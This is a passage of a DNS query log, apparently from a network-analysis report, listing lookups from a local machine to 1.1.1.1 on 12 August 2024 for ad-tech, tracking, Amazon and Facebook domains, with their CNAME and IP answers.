                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.847640038 CEST1.1.1.1192.168.2.40xd59fNo error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.847640038 CEST1.1.1.1192.168.2.40xd59fNo error (0)tagr-pixel-nginx-odr-euw4.mookie1.com34.160.236.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.863673925 CEST1.1.1.1192.168.2.40x6884No error (0)c1.adform.nettrack.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.866060972 CEST1.1.1.1192.168.2.40xb576No error (0)c1.adform.nettrack.adformnet.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.884027958 CEST1.1.1.1192.168.2.40x399No error (0)s.amazon-adsystem.com52.46.143.56A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.893719912 CEST1.1.1.1192.168.2.40xa9c5No error (0)sync.rfp.fout.jp35.186.196.148A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.957453012 CEST1.1.1.1192.168.2.40x1c2bNo error (0)aax-eu.amazon-adsystem.com67.220.224.144A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.965430975 CEST1.1.1.1192.168.2.40xbfadNo error (0)a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net13.33.119.57A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.965430975 CEST1.1.1.1192.168.2.40xbfadNo error (0)a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net13.33.119.163A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.965430975 CEST1.1.1.1192.168.2.40xbfadNo error (0)a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net13.33.119.26A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:13.965430975 CEST1.1.1.1192.168.2.40xbfadNo error (0)a1d260d3e4810dfad67eec02571e86f4b.profile.akl50-c2.cloudfront.net13.33.119.133A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.153903008 CEST1.1.1.1192.168.2.40x9f2dNo error (0)bs.serving-sys.combs.eyeblaster.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.153903008 CEST1.1.1.1192.168.2.40x9f2dNo error (0)aka-fr.ads.sizmdx.comadserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.153903008 CEST1.1.1.1192.168.2.40x9f2dNo error (0)adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.com18.193.192.41A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.153903008 CEST1.1.1.1192.168.2.40x9f2dNo error (0)adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.com52.59.68.178A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.153903008 CEST1.1.1.1192.168.2.40x9f2dNo error (0)adserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.com18.196.92.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.155124903 CEST1.1.1.1192.168.2.40x73eNo error (0)bs.serving-sys.combs.eyeblaster.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.155124903 CEST1.1.1.1192.168.2.40x73eNo error (0)aka-fr.ads.sizmdx.comadserver-prod-alb-2056226458.eu-central-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.273967981 CEST1.1.1.1192.168.2.40x7dafNo error (0)cookie-matching.mediarithmics.comlb.mediarithmics.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.273967981 CEST1.1.1.1192.168.2.40x7dafNo error (0)lb.mediarithmics.com54.36.150.186A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.273967981 CEST1.1.1.1192.168.2.40x7dafNo error (0)lb.mediarithmics.com54.36.150.182A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.273967981 CEST1.1.1.1192.168.2.40x7dafNo error (0)lb.mediarithmics.com54.36.150.183A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.273967981 CEST1.1.1.1192.168.2.40x7dafNo error (0)lb.mediarithmics.com54.36.150.180A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.273967981 CEST1.1.1.1192.168.2.40x7dafNo error (0)lb.mediarithmics.com54.36.150.187A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.273967981 CEST1.1.1.1192.168.2.40x7dafNo error (0)lb.mediarithmics.com54.36.150.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.273967981 CEST1.1.1.1192.168.2.40x7dafNo error (0)lb.mediarithmics.com54.36.150.181A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.273967981 CEST1.1.1.1192.168.2.40x7dafNo error (0)lb.mediarithmics.com54.36.150.185A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.277862072 CEST1.1.1.1192.168.2.40x5120No error (0)cookie-matching.mediarithmics.comlb.mediarithmics.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.301055908 CEST1.1.1.1192.168.2.40x1f7No error (0)cm.g.doubleclick.net142.250.185.130A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.562166929 CEST1.1.1.1192.168.2.40x271dName error (3)usermatch.krxd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.562500954 CEST1.1.1.1192.168.2.40x85c4Name error (3)usermatch.krxd.netnonenone65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.572438955 CEST1.1.1.1192.168.2.40x295dName error (3)usermatch.krxd.netnonenoneA (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.574543953 CEST1.1.1.1192.168.2.40xa006No error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.575798035 CEST1.1.1.1192.168.2.40xe55dNo error (0)odr.mookie1.comtagr-pixel-nginx-odr-euw4.mookie1.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.575798035 CEST1.1.1.1192.168.2.40xe55dNo error (0)tagr-pixel-nginx-odr-euw4.mookie1.com34.160.236.64A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.580735922 CEST1.1.1.1192.168.2.40x4df6No error (0)csync.loopme.meenvoy-hl.envoy-csync1.core-b8mf.ov1o.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.580735922 CEST1.1.1.1192.168.2.40x4df6No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com34.1.224.11A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.580735922 CEST1.1.1.1192.168.2.40x4df6No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.185.194A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.580735922 CEST1.1.1.1192.168.2.40x4df6No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.151.161A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.580735922 CEST1.1.1.1192.168.2.40x4df6No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.189.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.580735922 CEST1.1.1.1192.168.2.40x4df6No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.141.90A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.580735922 CEST1.1.1.1192.168.2.40x4df6No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.255.241A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.580735922 CEST1.1.1.1192.168.2.40x4df6No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.199.71A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.580735922 CEST1.1.1.1192.168.2.40x4df6No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.169.131A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.580735922 CEST1.1.1.1192.168.2.40x4df6No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.180.20A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.580735922 CEST1.1.1.1192.168.2.40x4df6No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.195.156A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.580735922 CEST1.1.1.1192.168.2.40x4df6No error (0)envoy-hl.envoy-csync1.core-b8mf.ov1o.com35.214.150.227A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.581018925 CEST1.1.1.1192.168.2.40x7233No error (0)csync.loopme.meenvoy-hl.envoy-csync1.core-b8mf.ov1o.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.802459955 CEST1.1.1.1192.168.2.40x754fNo error (0)us-u.openx.net34.98.64.218A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.802459955 CEST1.1.1.1192.168.2.40x754fNo error (0)us-u.openx.net35.244.159.8A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.982620001 CEST1.1.1.1192.168.2.40xac12No error (0)ssum-sec.casalemedia.com104.18.36.155A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.982620001 CEST1.1.1.1192.168.2.40xac12No error (0)ssum-sec.casalemedia.com172.64.151.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:14.982635021 CEST1.1.1.1192.168.2.40x157dNo error (0)ssum-sec.casalemedia.com65IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.310467958 CEST1.1.1.1192.168.2.40x965aNo error (0)lm.serving-sys.comlm.eyeblaster.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.310467958 CEST1.1.1.1192.168.2.40x965aNo error (0)aka-lm-fr.ads.sizmdx.comadserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.311029911 CEST1.1.1.1192.168.2.40x2599No error (0)lm.serving-sys.comlm.eyeblaster.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.311029911 CEST1.1.1.1192.168.2.40x2599No error (0)aka-lm-fr.ads.sizmdx.comadserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.311029911 CEST1.1.1.1192.168.2.40x2599No error (0)adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.com52.28.91.150A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.311029911 CEST1.1.1.1192.168.2.40x2599No error (0)adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.com3.77.62.68A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.311029911 CEST1.1.1.1192.168.2.40x2599No error (0)adserver-logmodule-prod-nlb-v17-49f63daf8a61d3c8.elb.eu-central-1.amazonaws.com18.196.77.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.522365093 CEST1.1.1.1192.168.2.40x91dNo error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.522416115 CEST1.1.1.1192.168.2.40x51bcNo error (0)eb2.3lift.comeu-eb2.3lift.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.522416115 CEST1.1.1.1192.168.2.40x51bcNo error (0)eu-eb2.3lift.com76.223.111.18A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.522416115 CEST1.1.1.1192.168.2.40x51bcNo error (0)eu-eb2.3lift.com13.248.245.213A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.524507046 CEST1.1.1.1192.168.2.40x3242No error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.524507046 CEST1.1.1.1192.168.2.40x3242No error (0)uip.semasio.net77.243.51.121A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.524507046 CEST1.1.1.1192.168.2.40x3242No error (0)uip.semasio.net77.243.51.122A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:15.524866104 CEST1.1.1.1192.168.2.40x5100No error (0)uipglob.semasio.netuipglob.trafficmanager.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.041390896 CEST1.1.1.1192.168.2.40x8a67No error (0)unagi-na.amazon.com44.215.130.62A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.041390896 CEST1.1.1.1192.168.2.40x8a67No error (0)unagi-na.amazon.com44.215.132.93A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.041390896 CEST1.1.1.1192.168.2.40x8a67No error (0)unagi-na.amazon.com44.215.132.129A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.041390896 CEST1.1.1.1192.168.2.40x8a67No error (0)unagi-na.amazon.com44.215.139.172A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.041390896 CEST1.1.1.1192.168.2.40x8a67No error (0)unagi-na.amazon.com44.215.133.88A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.041390896 CEST1.1.1.1192.168.2.40x8a67No error (0)unagi-na.amazon.com44.215.132.248A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.041390896 CEST1.1.1.1192.168.2.40x8a67No error (0)unagi-na.amazon.com44.215.116.52A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.041390896 CEST1.1.1.1192.168.2.40x8a67No error (0)unagi-na.amazon.com44.215.117.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.404117107 CEST1.1.1.1192.168.2.40x4b9cNo error (0)crb.kargo.com3.126.77.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.404117107 CEST1.1.1.1192.168.2.40x4b9cNo error (0)crb.kargo.com18.197.94.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.404117107 CEST1.1.1.1192.168.2.40x4b9cNo error (0)crb.kargo.com35.156.51.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.491271019 CEST1.1.1.1192.168.2.40x8058No error (0)uipus.semasio.net50.57.31.206A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.514067888 CEST1.1.1.1192.168.2.40xca85No error (0)usersync.gumgum.com52.210.15.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.514067888 CEST1.1.1.1192.168.2.40xca85No error (0)usersync.gumgum.com34.247.205.196A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.514067888 CEST1.1.1.1192.168.2.40xca85No error (0)usersync.gumgum.com34.247.233.198A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.928924084 CEST1.1.1.1192.168.2.40x62eNo error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.928924084 CEST1.1.1.1192.168.2.40x62eNo error (0)image2v2.pubmnet.compug-ams-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.929893970 CEST1.1.1.1192.168.2.40x2526No error (0)image2.pubmatic.comimage2v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.929893970 CEST1.1.1.1192.168.2.40x2526No error (0)image2v2.pubmnet.compug-lhr-bc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.929893970 CEST1.1.1.1192.168.2.40x2526No error (0)pug-lhr-bc.pubmnet.com185.64.191.210A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.971896887 CEST1.1.1.1192.168.2.40x414cNo error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:16.972544909 CEST1.1.1.1192.168.2.40xb08No error (0)token.rubiconproject.compixel.rubiconproject.net.akadns.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.346929073 CEST1.1.1.1192.168.2.40x8b70No error (0)loadus.exelator.comloadus.tm.ssl.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.346929073 CEST1.1.1.1192.168.2.40x8b70No error (0)loadus.tm.ssl.exelator.comeu-west.load.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.346929073 CEST1.1.1.1192.168.2.40x8b70No error (0)eu-west.load.exelator.comload-euw1.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.346992016 CEST1.1.1.1192.168.2.40x926No error (0)loadus.exelator.comloadus.tm.ssl.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.346992016 CEST1.1.1.1192.168.2.40x926No error (0)loadus.tm.ssl.exelator.comeu-west.load.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.346992016 CEST1.1.1.1192.168.2.40x926No error (0)eu-west.load.exelator.comload-euw1.exelator.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.346992016 CEST1.1.1.1192.168.2.40x926No error (0)load-euw1.exelator.com54.78.254.47A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.523705959 CEST1.1.1.1192.168.2.40x7db2No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.523799896 CEST1.1.1.1192.168.2.40xf648No error (0)www.facebook.comstar-mini.c10r.facebook.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.523799896 CEST1.1.1.1192.168.2.40xf648No error (0)star-mini.c10r.facebook.com157.240.0.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.526155949 CEST1.1.1.1192.168.2.40xcfd1No error (0)crb.kargo.com3.126.77.184A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.526155949 CEST1.1.1.1192.168.2.40xcfd1No error (0)crb.kargo.com18.197.94.79A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.526155949 CEST1.1.1.1192.168.2.40xcfd1No error (0)crb.kargo.com35.156.51.27A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.997148037 CEST1.1.1.1192.168.2.40xffb1No error (0)sync-amazon.ads.yieldmo.comsync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.997148037 CEST1.1.1.1192.168.2.40xffb1No error (0)sync.ads.yieldmo.comeu-west-1-sync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.997148037 CEST1.1.1.1192.168.2.40xffb1No error (0)eu-west-1-sync.ads.yieldmo.comsync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.997272015 CEST1.1.1.1192.168.2.40x57adNo error (0)sync-amazon.ads.yieldmo.comsync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.997272015 CEST1.1.1.1192.168.2.40x57adNo error (0)sync.ads.yieldmo.comeu-west-1-sync.ads.yieldmo.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.997272015 CEST1.1.1.1192.168.2.40x57adNo error (0)eu-west-1-sync.ads.yieldmo.comsync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.997272015 CEST1.1.1.1192.168.2.40x57adNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com54.154.6.193A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.997272015 CEST1.1.1.1192.168.2.40x57adNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.31.182.111A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.997272015 CEST1.1.1.1192.168.2.40x57adNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.31.121.35A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.997272015 CEST1.1.1.1192.168.2.40x57adNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com34.251.153.173A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.997272015 CEST1.1.1.1192.168.2.40x57adNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com34.254.83.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:17.997272015 CEST1.1.1.1192.168.2.40x57adNo error (0)sync-yieldmo-com-tf-1869548451.eu-west-1.elb.amazonaws.com52.211.109.171A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.225752115 CEST1.1.1.1192.168.2.40x8498No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.226190090 CEST1.1.1.1192.168.2.40x8179No error (0)a.nel.cloudflare.com35.190.80.1A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.425146103 CEST1.1.1.1192.168.2.40x4ac6No error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.425146103 CEST1.1.1.1192.168.2.40x4ac6No error (0)image6v2.pubmnet.compugm-amsfpairbc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.425643921 CEST1.1.1.1192.168.2.40x6aa2No error (0)sync.sxp.smartclip.net35.186.194.101A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.427362919 CEST1.1.1.1192.168.2.40x6ab1No error (0)image6.pubmatic.comimage6v2.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.427362919 CEST1.1.1.1192.168.2.40x6ab1No error (0)image6v2.pubmnet.compugm-lhrc.pubmnet.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:18.427362919 CEST1.1.1.1192.168.2.40x6ab1No error (0)pugm-lhrc.pubmnet.com185.64.190.78A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:24.146168947 CEST1.1.1.1192.168.2.40xd9b1No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:24.146168947 CEST1.1.1.1192.168.2.40xd9b1No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:24.146168947 CEST1.1.1.1192.168.2.40xd9b1No error (0)dlsq0ztllwnya.cloudfront.net52.222.236.81A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:24.146168947 CEST1.1.1.1192.168.2.40xd9b1No error (0)dlsq0ztllwnya.cloudfront.net52.222.236.115A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:24.146168947 CEST1.1.1.1192.168.2.40xd9b1No error (0)dlsq0ztllwnya.cloudfront.net52.222.236.107A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:24.146168947 CEST1.1.1.1192.168.2.40xd9b1No error (0)dlsq0ztllwnya.cloudfront.net52.222.236.76A (IP address)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:24.149611950 CEST1.1.1.1192.168.2.40xbbe6No error (0)www.amazon.aetp.c9a5976c7-frontier.amazon.aeCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:24.149611950 CEST1.1.1.1192.168.2.40xbbe6No error (0)tp.c9a5976c7-frontier.amazon.aedlsq0ztllwnya.cloudfront.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.169024944 CEST1.1.1.1192.168.2.40x4416No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.169024944 CEST1.1.1.1192.168.2.40x4416No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.169024944 CEST1.1.1.1192.168.2.40x4416No error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.169024944 CEST1.1.1.1192.168.2.40x4416No error (0)a.media-amazon.coma.media-amazon.com.akamaized.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.169960976 CEST1.1.1.1192.168.2.40x6f54No error (0)images-eu.ssl-images-amazon.comm.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.169960976 CEST1.1.1.1192.168.2.40x6f54No error (0)m.media-amazon.comtp.c47710ee9-frontier.media-amazon.comCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                                                                                                                                Aug 12, 2024 15:24:25.169960976 CEST1.1.1.1192.168.2.40x6f54No error (0)tp.c47710ee9-frontier.media-amazon.coma.media-amazon.comCNAME (Canonical name)IN (0x0001)false
